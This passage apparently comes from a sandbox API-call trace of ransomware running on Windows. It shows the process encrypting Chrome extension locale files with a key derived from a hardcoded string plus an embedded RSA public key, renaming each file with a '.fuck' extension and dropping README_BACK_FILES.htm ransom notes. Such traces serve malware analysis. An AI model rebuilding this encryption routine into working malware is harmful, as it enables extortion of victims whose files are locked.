lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.311] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.311] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.311] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.311] GetLastError () returned 0x0 [0260.311] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json")) returned 0x20 [0260.312] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0260.312] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.314] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.314] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.315] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.317] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.317] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.317] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.317] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.317] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.317] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.317] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f9f0) returned 1 [0260.318] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f9f0, dwCertEncodingType=0x1, pInfo=0x2eb1a00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1a30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1a38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d440) returned 1 [0260.318] CryptEncrypt (in: hKey=0x2e7d440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.318] CryptEncrypt (in: hKey=0x2e7d440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6fd20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6fd20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.318] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6fd20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6fd20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.319] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x10c, lpOverlapped=0x0) returned 1 [0260.322] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x10c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0260.322] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0260.323] CloseHandle (hObject=0x5d5c) returned 1 [0260.323] CloseHandle (hObject=0x5d64) returned 1 [0260.323] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0260.326] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0260.326] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.gsg")) returned 1 [0260.327] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.fuck")) returned 1 [0260.328] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.328] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.328] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.328] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.328] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.328] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0260.329] AreFileApisANSI () returned 1 [0260.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.329] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.329] GetFileType (hFile=0x5d60) returned 0x1 [0260.329] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.330] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.330] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.331] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.331] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.331] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.331] GetLastError () returned 0x0 [0260.331] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json")) returned 0x20 [0260.332] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0260.332] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.332] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.333] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.333] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.335] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.335] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.335] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.335] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.335] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.336] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.336] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f858) returned 1 [0260.336] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f858, dwCertEncodingType=0x1, pInfo=0x2eb2490*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb24c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb24c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d240) returned 1 [0260.336] CryptEncrypt (in: hKey=0x2e7d240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.336] CryptEncrypt (in: hKey=0x2e7d240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e701e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e701e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.336] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e701e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e701e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.337] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x121, lpOverlapped=0x0) returned 1 [0260.338] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x121, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0260.338] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0260.338] CloseHandle (hObject=0x5d64) returned 1 [0260.338] CloseHandle (hObject=0x5d5c) returned 1 [0260.338] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0260.341] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0260.341] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.gsg")) returned 1 [0260.343] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.fuck")) returned 1 [0260.344] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.344] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.344] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.344] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.344] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.344] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0260.344] AreFileApisANSI () returned 1 [0260.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.345] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.345] GetFileType (hFile=0x5d60) returned 0x1 [0260.345] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.347] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.347] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.347] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.347] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.347] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.347] GetLastError () returned 0x0 [0260.347] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json")) returned 0x20 [0260.347] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json", dwFileAttributes=0x80) returned 1 [0260.356] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.357] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.358] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.358] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.360] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.360] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.360] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.360] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.360] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, 